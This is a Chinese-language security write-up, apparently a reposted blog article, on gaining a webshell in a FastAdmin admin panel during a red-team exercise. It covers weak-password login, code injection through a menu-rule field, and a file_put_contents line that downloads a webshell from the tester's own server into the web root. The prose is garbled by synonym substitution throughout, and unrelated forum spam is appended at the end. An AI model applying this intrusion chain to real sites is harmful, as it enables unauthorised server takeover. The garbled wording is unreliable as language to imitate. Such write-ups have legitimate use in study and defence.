记一次FastAdmin后台Getshell
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_gif/3xxicXNlTXLicwgPqvK8QgwnCr09iaSllrsXJLMkThiaHibEntZKkJiaicEd4ibWQxyn3gtAWbyGqtHVb0qqsHFC9jW3oQ/640?wx_fmt=gif&tp=webp&wxfrom=5&wx_lazy=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">FastAdmin介绍</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">FastAdmin是基于ThinkPHP5和Bootstrap的极速后台<span style="color: black;">研发</span>框架,基于ThinkPHP<span style="color: black;">行径</span>功能实现的插件机制,<span style="color: black;">持有</span>丰富的插件和扩展,可直接在线安装卸载。</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">基于完善的Auth权限<span style="color: black;">掌控</span>管理、无限父子级</span><span style="color: black;">权限分组、可自由分配子级权限、一个管理员可<span style="color: black;">同期</span>属于多个组别。</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">测试过程</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">在某次HVV的打点过程中,<span style="color: black;">发掘</span>某资产为FastAdmin搭建。下图为FastAdmin的报错页面,<span style="color: black;">按照</span>经验可判断该网站为FastAdmin搭建。</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4Ztic9NJbPHkfHJGUlibO9jJibELfpUKKhnF4rcM88xORVBYdEROzOabXA/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">输入admin.php进入后台登录页面,弱口令进入后台。</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4mdQVyJTibK2RfJ1BEplp7PPvXt6pv4tRPPnfXP0fLOfOMtNeDJqqvNQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4galN70Kv9wwAOxKFeLzo9tAXkQicribULOAZuhh2wM8ib4Ome6923Dia8A/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">进入后台找功能点getshell。后台默认会有插件管理功能,<span style="color: black;">然则</span><span style="color: black;">咱们</span>在后台<span style="color: black;">无</span>找到这个功能,<span style="color: black;">咱们</span>直接<span style="color: black;">拜访</span>插件管理的<span style="color: black;">位置</span></span></p><span style="color: black;">/admin/addon?<span style="color: black;">ref</span>=addtabs</span><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4f5FW9YgBnbCib8VEu7zcqMXTnVraGXKAtuMALiadS18oaODBSyq4Akdw/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">理论上离线安装 Fileix文件管理器 ,<span style="color: black;">而后</span>上传一句话木马就<span style="color: black;">能够</span>getshell,<span style="color: black;">然则</span>很可惜失败了。</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4IrCzN04clFu8j1Ysuf0YELUxAfOobYsBdSQgGhp1sPqynoHBh2czYQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">接着翻后台,<span style="color: black;">发掘</span>有<span style="color: black;">按时</span>任务功能,尝试反弹shell,写入反弹shell的语句后,在服务器上nc监听等待回连,<span style="color: black;">然则</span><span style="color: black;">发掘</span>并<span style="color: black;">无</span>执行。</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4IVR0l5xs4tx8S1BKtvBSAKn65eu1PHcSIV4VKMwsYHc2RP9jm9SA7w/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">后面一看之前管理员设置过的<span style="color: black;">按时</span>任务<span style="color: black;">亦</span><span style="color: black;">无</span>执行过,失败!</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4dFWZbwYQydELAOxzRGUjAzVe7aSlb6taQsUYzyk2xNKZ9GzpsWk6Gw/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">继续翻后台,<span style="color: black;">发掘</span>在菜单规则中<span style="color: black;">能够</span>创建规则<span style="color: black;">要求</span>,尝试在功能点中写入phpinfo()。</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">必须写在权限管理中!</span><span style="color: black;">!</span><span style="color: black;">!</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4LaTX3IWCFsusDNCgUDIhtzlsmxGicdvSn7TQCZ14hhEN4sLWgMHKJQQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">而后</span>来到管理员管理中,添加一个管理员。</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">所属组别必须为二级管理员组!</span><span style="color: black;">!</span><span style="color: black;">!</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib42vZ7m6HITsekSicGOr22npbJDcf9Cky7rx3Qe4C20XqCyDdDGR39JXA/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">添加完成之后,重新用新添加的账户登录后台,<span style="color: black;">能够</span><span style="color: black;">发掘</span>phpinfo()被成功执行。</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib43ddqZGlxbnRnsWtRicCfQ16AprDHzDBD7eBF2OMqxRN77l6ibly2BJmw/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">经过</span>搜索$_SERVER[‘DOCUMENT_ROOT’]获取网站根目录,为/www/wwwroot/xxxxxxxxx/</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4G1Y5ovnOVXSRlXIH7EoVCQhXIfYIVoSjAZJ62vZuLgBOj0JnS2qcLQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">找到根路径后注销账户,准备一个webshell木马名为1.php,放在自己的服务器上,<span style="color: black;">运用</span>python<span style="color: black;">起步</span>一个临时web。</span></p><span style="color: black;"><span style="color: black;">python3</span> <span style="color: black;">-m</span> <span style="color: black;">http</span><span style="color: black;">.server</span>8080</span><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4Td2HjTla18bWfJDnFL0s2XVCiaYrHMcT7CD0TY3wrHcjl1uv3343F2Q/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">在回到管理后台<span style="color: black;">其中</span>,在<span style="color: black;">一样</span>的位置写入如下语句,将远程服务器的webshell木马下载到网站根目录。</span></p><span style="color: black;">file_put_contents(<span style="color: black;">/www/wwwroot/xxxxxxxxx/shell.php</span>,file_get_contents(<span style="color: black;">临时web<span style="color: black;">位置</span>/1.php</span>))</span><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4iaVnjZvjPqOo8vkCagyyVbhlMYuLHv0Omc7V1hulaFVdATG6QmTOicQA/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">保留</span>完成后,再次<span style="color: black;">运用</span>刚才新创建的用户登录</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4fab6833f0T0d5iaAdrffffLKtVocRwsW3OUUfE3N8iaEaCAibpsIYvbVg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4WAULvp2Jrfov4iaNcEOAVP96sAE1icFAZiaib5WPXlQ5F7lWKdbQ8XwmEg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">webshell木马已被成功写入。</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4yk3e2KMtvm9iciaQ5bEqKKIHrcj5BWtLGB3icuIPZlfwHEKRiazIKkiaY0A/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">总结</span></strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">在打点过程中, <span style="color: black;">经过</span>指纹识别软件进行指纹识别进行相应的漏洞利用,在未识别出指纹的需人工判断,<span style="color: black;">按照</span>报错页面的样式识别指纹一种较好的<span style="color: black;">办法</span>。</span></p><span style="color: black;">整体打点过程:浏览网站—><span style="color: black;">发掘</span>报错页面指纹为FastAdmin—><span style="color: black;">经过</span>弱口令进入后台—>规则<span style="color: black;">要求</span>中写入phpinfo()—><span style="color: black;">得到</span>网站根目录—>规则<span style="color: black;">要求</span>中写入webshell。</span><span style="color: black;"><span style="color: black;">文案</span><span style="color: black;">源自</span>:culprit(语雀)</span><span style="color: black;">原文<span style="color: black;">位置</span>:https:<span style="color: black;">//www.yuque.com/culprit/note/nyvtuz</span></span><span style="color: black;">排版:潇湘信安</span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">黑白之道发布、转载的<span style="color: black;">文案</span>中所<span style="color: black;">触及</span>的技术、思路和工具仅供以安全为目的的学习交流<span style="color: black;">运用</span>,任何人不得将其用于<span style="color: black;">违法</span>用途及盈利等目的,否则后果<span style="color: black;">自动</span>承担!</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">如侵权请私聊<span style="color: black;">咱们</span>删文</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">END</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_jpg/3xxicXNlTXL8fHInwic65QarBzLTDecgAlRicyRRNJu5ItVq0eGBmhibeaUEib2sMnAsOTOHicWtz7P2iaAeftdlNQGCg/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">多一个点在看</span><img src="https://mmbiz.qpic.cn/mmbiz_gif/zYdFdnRZ0h95ZAL5c8h6iaMiaqbgljvZ80YraNgwWAtyyZRGT8INEgx8qWKgf9wXribCDNibDvDa2R1EQB4grqAKDg/640?wx_fmt=gif&tp=webp&wxfrom=5&wx_lazy=1" style="width: 50%; margin-bottom: 20px;"><span style="color: black;">多一条小鱼干</span></p>
楼主继续加油啊!外链论坛加油! 软文发布论坛开幕式圆满成功。 http://www.fok120.com 外链论坛的成功举办,是与各位领导、同仁们的关怀和支持分不开的。在此,我谨代表公司向关心和支持论坛的各界人士表示最衷心的感谢!
页:
[1]